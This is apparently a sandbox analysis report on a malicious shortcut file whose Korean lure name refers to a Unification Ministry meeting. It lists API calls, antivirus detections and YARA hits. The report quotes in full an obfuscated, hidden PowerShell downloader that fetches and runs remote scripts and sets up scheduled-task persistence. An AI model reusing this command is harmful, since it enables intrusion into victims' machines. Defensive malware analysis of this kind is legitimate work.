NtAllocateVirtualMemory Aug. 21, 2024, 3:17 p.m.	process_identifier: 2640 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0276b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 21, 2024, 3:17 p.m.	process_identifier: 2640 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x027d2000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 21, 2024, 3:17 p.m.	process_identifier: 2640 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x027e5000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 21, 2024, 3:17 p.m.	process_identifier: 2640 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02775000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 21, 2024, 3:17 p.m.	process_identifier: 2640 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x027dc000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 21, 2024, 3:17 p.m.	process_identifier: 2640 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05030000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 21, 2024, 3:17 p.m.	process_identifier: 2640 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02776000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 21, 2024, 3:17 p.m.	process_identifier: 2640 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x027ec000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 21, 2024, 3:17 p.m.	process_identifier: 2640 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x027d3000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 21, 2024, 3:17 p.m.	process_identifier: 2640 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x027d4000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 21, 2024, 3:17 p.m.	process_identifier: 2640 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x027d5000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 21, 2024, 3:17 p.m.	process_identifier: 2640 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x027d6000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 21, 2024, 3:17 p.m.	process_identifier: 2640 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x027d7000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 21, 2024, 3:17 p.m.	process_identifier: 2640 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x027d8000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 21, 2024, 3:17 p.m.	process_identifier: 2640 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x027d9000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 21, 2024, 3:17 p.m.	process_identifier: 2640 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x050e0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 21, 2024, 3:17 p.m.	process_identifier: 2640 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x050e1000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 21, 2024, 3:17 p.m.	process_identifier: 2640 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x050e2000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 21, 2024, 3:17 p.m.	process_identifier: 2640 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x050e3000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 21, 2024, 3:17 p.m.	process_identifier: 2640 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x050e4000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 21, 2024, 3:17 p.m.	process_identifier: 2640 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x050e5000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 21, 2024, 3:17 p.m.	process_identifier: 2640 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x050e6000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 21, 2024, 3:17 p.m.	process_identifier: 2640 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x050e7000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 21, 2024, 3:17 p.m.	process_identifier: 2640 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x050e8000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 21, 2024, 3:17 p.m.	process_identifier: 2640 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x050e9000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 21, 2024, 3:17 p.m.	process_identifier: 2640 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x050ea000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 21, 2024, 3:17 p.m.	process_identifier: 2640 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x050eb000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 21, 2024, 3:17 p.m.	process_identifier: 2640 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x050ec000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 21, 2024, 3:17 p.m.	process_identifier: 2640 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x050ed000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 21, 2024, 3:17 p.m.	process_identifier: 2640 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x050ee000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 21, 2024, 3:17 p.m.	process_identifier: 2640 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x050ef000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 21, 2024, 3:17 p.m.	process_identifier: 2640 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x050f0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 21, 2024, 3:17 p.m.	process_identifier: 2640 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x050f1000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 21, 2024, 3:17 p.m.	process_identifier: 2640 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x050f2000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 21, 2024, 3:17 p.m.	process_identifier: 2640 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x050f3000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 21, 2024, 3:17 p.m.	process_identifier: 2640 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x050f4000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1

Creates executable files on the filesystem (2 events)

file	C:\Users\test22\AppData\Local\Temp\ms_update.ps1
file	C:\Users\test22\AppData\Local\Temp\hello9.ps1

Creates a shortcut to an executable file (2 events)

file	C:\Users\test22\AppData\Local\Temp\통일부 5월 간담회 계획안(줄리 터너대사 방한건_인권 탈북).docx.lnk
file	C:\Users\test22\AppData\Local\Temp\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk

Creates a suspicious process (2 events)

cmdline

"C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -nop -NoProfile -NonInteractive -ExecutionPolicy Bypass -c "$ss =\"JGhoaCA9IEpvaW4tUGF0aCAoW1N5c3RlbS5JTy5QYXRoXTo6R2V0VGVtcFBhdGgoKSkgIu2GteydvOu2gCA17JuUIOqwhOuLtO2ajCDqs4Ttmo3slYgo7KSE66asIO2EsOuEiOuMgOyCrCDrsKntlZzqsbRf7J246raMIO2DiOu2gSkuZG9jeCI7IEludm9rZS1XZWJSZXF1ZXN0IC1VcmkgImh0dHA6Ly8xMjcuMC4wLjEvMDUyMS5kb2N4IiAtT3V0RmlsZSAkaGhoOyAmICRoaGg7ICRmaWxlUGF0aCA9IEpvaW4tUGF0aCAoW1N5c3RlbS5JTy5QYXRoXTo6R2V0VGVtcFBhdGgoKSkgIm1zX3VwZGF0ZS5wczEiOyAkc3RyID0gJyRhYWEgPSBKb2luLVBhdGggKFtTeXN0ZW0uSU8uUGF0aF06OkdldFRlbXBQYXRoKCkpICJ0dHQucHMxIjsgSW52b2tlLVdlYlJlcXVlc3QgLVVyaSAiaHR0cDovLzEyNy4wLjAuMi8wNTIxLXgudHh0IiAtT3V0RmlsZSAkYWFhOyAmICRhYWE7IFJlbW92ZS1JdGVtIC1QYXRoICRhYWEgLUZvcmNlOyc7ICRzdHIgfCBPdXQtRmlsZSAtRmlsZVBhdGggJGZpbGVQYXRoIC1FbmNvZGluZyBVVEY4OyAkYWN0aW9uID0gTmV3LVNjaGVkdWxlZFRhc2tBY3Rpb24gLUV4ZWN1dGUgJ1Bvd2VyU2hlbGwuZXhlJyAtQXJndW1lbnQgJy1XaW5kb3dTdHlsZSBIaWRkZW4gLW5vcCAgLU5vbkludGVyYWN0aXZlIC1Ob1Byb2ZpbGUgLUV4ZWN1dGlvblBvbGljeSBCeXBhc3MgLUNvbW1hbmQgIiYgeyRmaWxlUGF0aCA9IEpvaW4tUGF0aCAoW1N5c3RlbS5JTy5QYXRoXTo6R2V0VGVtcFBhdGgoKSkgXCJtc191cGRhdGUucHMxXCI7IHBvd2Vyc2hlbGwgLXdpbmRvd3N0eWxlIGhpZGRlbiAtRXhlY3V0aW9uUG9saWN5IEJ5cGFzcyAtRmlsZSAkZmlsZVBhdGg7fSInOyAkdHJpZ2dlciA9IE5ldy1TY2hlZHVsZWRUYXNrVHJpZ2dlciAtT25jZSAtQXQgKEdldC1EYXRlKS5BZGRNaW51dGVzKDUpIC1SZXBldGl0aW9uSW50ZXJ2YWwgKE5ldy1UaW1lU3BhbiAtTWludXRlcyAzMCk7ICRzZXR0aW5ncyA9IE5ldy1TY2hlZHVsZWRUYXNrU2V0dGluZ3NTZXQgLUhpZGRlbjsgUmVnaXN0ZXItU2NoZWR1bGVkVGFzayAtVGFza05hbWUgIk1pY3Jvc29mdEVkZ2VVcGRhdGVUYXNrTWFjaGluZVRVQUsiIC1BY3Rpb24gJGFjdGlvbiAtVHJpZ2dlciAkdHJpZ2dlciAtU2V0dGluZ3MgJHNldHRpbmdzOyAgJGFhYSA9IEpvaW4tUGF0aCAoW1N5c3RlbS5JTy5QYXRoXTo6R2V0VGVtcFBhdGgoKSkgInN3X2ZpcnN0LnBzMSI7IEludm9rZS1XZWJSZXF1ZXN0IC1VcmkgImh0dHBzOi8vMTI3LjAuMC4zLzA1MjEtZi50eHQiIC1PdXRGaWxlICRhYWE7ICYgJGFhYTsgUmVtb3ZlLUl0ZW0gLVBhdGggJGFhYSAtRm9yY2U7\"; $aa = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($ss));$cc = [System.IO.Path]::GetTempPath();$dd = \"hello9.ps1\";$ee = Join-Path $cc $dd;$aa | Out-File -FilePath $ee; $aaaaa= 89897878; powershell -windowstyle hidden -ExecutionPolicy Bypass $ee"

cmdline

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -ExecutionPolicy Bypass C:\Users\test22\AppData\Local\Temp\hello9.ps1

A process created a hidden window (2 events)

Time & API	Arguments	Status	Return	Repeated
CreateProcessInternalW Aug. 21, 2024, 3:17 p.m.	thread_identifier: 2644 thread_handle: 0x00000330 process_identifier: 2640 current_directory: C:\Users\test22\AppData\Local\Temp filepath: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe track: 1 command_line: "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -nop -NoProfile -NonInteractive -ExecutionPolicy Bypass -c "$ss =\"JGhoaCA9IEpvaW4tUGF0aCAoW1N5c3RlbS5JTy5QYXRoXTo6R2V0VGVtcFBhdGgoKSkgIu2GteydvOu2gCA17JuUIOqwhOuLtO2ajCDqs4Ttmo3slYgo7KSE66asIO2EsOuEiOuMgOyCrCDrsKntlZzqsbRf7J246raMIO2DiOu2gSkuZG9jeCI7IEludm9rZS1XZWJSZXF1ZXN0IC1VcmkgImh0dHA6Ly8xMjcuMC4wLjEvMDUyMS5kb2N4IiAtT3V0RmlsZSAkaGhoOyAmICRoaGg7ICRmaWxlUGF0aCA9IEpvaW4tUGF0aCAoW1N5c3RlbS5JTy5QYXRoXTo6R2V0VGVtcFBhdGgoKSkgIm1zX3VwZGF0ZS5wczEiOyAkc3RyID0gJyRhYWEgPSBKb2luLVBhdGggKFtTeXN0ZW0uSU8uUGF0aF06OkdldFRlbXBQYXRoKCkpICJ0dHQucHMxIjsgSW52b2tlLVdlYlJlcXVlc3QgLVVyaSAiaHR0cDovLzEyNy4wLjAuMi8wNTIxLXgudHh0IiAtT3V0RmlsZSAkYWFhOyAmICRhYWE7IFJlbW92ZS1JdGVtIC1QYXRoICRhYWEgLUZvcmNlOyc7ICRzdHIgfCBPdXQtRmlsZSAtRmlsZVBhdGggJGZpbGVQYXRoIC1FbmNvZGluZyBVVEY4OyAkYWN0aW9uID0gTmV3LVNjaGVkdWxlZFRhc2tBY3Rpb24gLUV4ZWN1dGUgJ1Bvd2VyU2hlbGwuZXhlJyAtQXJndW1lbnQgJy1XaW5kb3dTdHlsZSBIaWRkZW4gLW5vcCAgLU5vbkludGVyYWN0aXZlIC1Ob1Byb2ZpbGUgLUV4ZWN1dGlvblBvbGljeSBCeXBhc3MgLUNvbW1hbmQgIiYgeyRmaWxlUGF0aCA9IEpvaW4tUGF0aCAoW1N5c3RlbS5JTy5QYXRoXTo6R2V0VGVtcFBhdGgoKSkgXCJtc191cGRhdGUucHMxXCI7IHBvd2Vyc2hlbGwgLXdpbmRvd3N0eWxlIGhpZGRlbiAtRXhlY3V0aW9uUG9saWN5IEJ5cGFzcyAtRmlsZSAkZmlsZVBhdGg7fSInOyAkdHJpZ2dlciA9IE5ldy1TY2hlZHVsZWRUYXNrVHJpZ2dlciAtT25jZSAtQXQgKEdldC1EYXRlKS5BZGRNaW51dGVzKDUpIC1SZXBldGl0aW9uSW50ZXJ2YWwgKE5ldy1UaW1lU3BhbiAtTWludXRlcyAzMCk7ICRzZXR0aW5ncyA9IE5ldy1TY2hlZHVsZWRUYXNrU2V0dGluZ3NTZXQgLUhpZGRlbjsgUmVnaXN0ZXItU2NoZWR1bGVkVGFzayAtVGFza05hbWUgIk1pY3Jvc29mdEVkZ2VVcGRhdGVUYXNrTWFjaGluZVRVQUsiIC1BY3Rpb24gJGFjdGlvbiAtVHJpZ2dlciAkdHJpZ2dlciAtU2V0dGluZ3MgJHNldHRpbmdzOyAgJGFhYSA9IEpvaW4tUGF0aCAoW1N5c3RlbS5JTy5QYXRoXTo6R2V0VGVtcFBhdGgoKSkgInN3X2ZpcnN0LnBzMSI7IEludm9rZS1XZWJSZXF1ZXN0IC1VcmkgImh0dHBzOi8vMTI3LjAuMC4zLzA1MjEtZi50eHQiIC1PdXRGaWxlICRhYWE7ICYgJGFhYTsgUmVtb3ZlLUl0ZW0gLVBhdGggJGFhYSAtRm9yY2U7\"; $aa = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($ss));$cc = [System.IO.Path]::GetTempPath();$dd = \"hello9.ps1\";$ee = Join-Path $cc $dd;$aa \| Out-File -FilePath $ee; $aaaaa= 89897878; powershell -windowstyle hidden -ExecutionPolicy Bypass $ee" filepath_r: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe stack_pivoted: 0 creation_flags: 67634196 (CREATE_DEFAULT_ERROR_MODE\|CREATE_NEW_CONSOLE\|CREATE_SUSPENDED\|CREATE_UNICODE_ENVIRONMENT\|EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 0 process_handle: 0x00000338	1	1	0
CreateProcessInternalW Aug. 21, 2024, 3:17 p.m.	thread_identifier: 2796 thread_handle: 0x00000488 process_identifier: 2792 current_directory: C:\Users\test22\AppData\Local\Temp filepath: track: 1 command_line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -ExecutionPolicy Bypass C:\Users\test22\AppData\Local\Temp\hello9.ps1 filepath_r: stack_pivoted: 0 creation_flags: 0 () inherit_handles: 1 process_handle: 0x0000048c	1	1	0

Checks for the Locally Unique Identifier on the system for a suspicious privilege (2 events)

Time & API	Arguments	Status	Return	Repeated
LookupPrivilegeValueW Aug. 21, 2024, 3:17 p.m.	system_name: privilege_name: SeDebugPrivilege	1	1	0
LookupPrivilegeValueW Aug. 21, 2024, 3:17 p.m.	system_name: privilege_name: SeDebugPrivilege	1	1	0

Yara rule detected in process memory (8 events)

description	(no description)	rule	DebuggerCheck__GlobalFlags
description	(no description)	rule	DebuggerCheck__QueryInfo
description	(no description)	rule	DebuggerHiding__Thread
description	(no description)	rule	DebuggerHiding__Active
description	(no description)	rule	ThreadControl__Context
description	(no description)	rule	SEH__vectored
description	Checks if being debugged	rule	anti_dbg
description	Bypass DEP	rule	disable_dep

File has been identified by 19 AntiVirus engines on VirusTotal as malicious (19 events)

Lionic	Trojan.WinLNK.Powecod.4!c
Skyhigh	BehavesLike.Trojan.fl
ALYac	Trojan.Agent.LNK.Gen
Symantec	Scr.Mallnk!gen1
McAfee	Artemis!028075A00BEB
Avast	LNK:Agent-EL [Trj]
Kaspersky	HEUR:Trojan.Multi.Powecod.a
MicroWorld-eScan	Trojan.GenericKD.73873058
Rising	Trojan.PSRunner/LNK!1.BADE (CLASSIC)
Sophos	Troj/LnkObf-T
SentinelOne	Static AI - Suspicious LNK
Google	Detected
Kingsoft	Script.Troj.CMDLnk.22143
ZoneAlarm	HEUR:Trojan.Multi.Powecod.a
Varist	LNK/ABTrojan.QOOA-
VBA32	Trojan.Link.Crafted
huorong	TrojanDownloader/LNK.Netloader.r
AVG	LNK:Agent-EL [Trj]
alibabacloud	Trojan:Multi/Powecod.a

One or more non-whitelisted processes were created (1 event)

parent_process

powershell.exe

martian_process

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -ExecutionPolicy Bypass C:\Users\test22\AppData\Local\Temp\hello9.ps1

Resumed a suspended thread in a remote process potentially indicative of process injection (2 events)

Time & API	Arguments	Status	Return	Repeated
Process injection	Process 2552 resumed a thread in remote process 2640
NtResumeThread Aug. 21, 2024, 3:17 p.m.	thread_handle: 0x00000330 suspend_count: 1 process_identifier: 2640	1	0	0

Creates a suspicious Powershell process (6 events)

option	-executionpolicy bypass	value	Attempts to bypass execution policy
option	-nop	value	Does not load current user profile
option	-windowstyle hidden	value	Attempts to execute command with a hidden window
option	-noninteractive	value	Prevents creating an interactive prompt for the user
option	-executionpolicy bypass	value	Attempts to bypass execution policy
option	-windowstyle hidden	value	Attempts to execute command with a hidden window

The process powershell.exe wrote an executable file to disk (20 events)

file	C:\Windows\System32\ie4uinit.exe
file	C:\Program Files\Windows Sidebar\sidebar.exe
file	C:\Windows\System32\WindowsAnytimeUpgradeUI.exe
file	C:\Windows\System32\xpsrchvw.exe
file	C:\Windows\System32\displayswitch.exe
file	C:\Program Files\Common Files\Microsoft Shared\ink\mip.exe
file	C:\Windows\System32\mblctr.exe
file	C:\Windows\System32\mstsc.exe
file	C:\Windows\System32\SnippingTool.exe
file	C:\Windows\System32\SoundRecorder.exe
file	C:\Windows\System32\dfrgui.exe
file	C:\Windows\System32\msinfo32.exe
file	C:\Windows\System32\rstrui.exe
file	C:\Program Files\Common Files\Microsoft Shared\ink\ShapeCollector.exe
file	C:\Program Files\Windows Journal\Journal.exe
file	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
file	C:\Windows\System32\MdSched.exe
file	C:\Windows\System32\msconfig.exe
file	C:\Windows\System32\recdisc.exe
file	C:\Windows\System32\msra.exe

통일부 5월 간담회 계획안(줄리 터너대사 방한건_인권 탈북).docx.lnk

Process Tree Toggle all

Network Toggle all

Suricata Toggle all

Suricata Alerts

Suricata TLS

Signatures Toggle All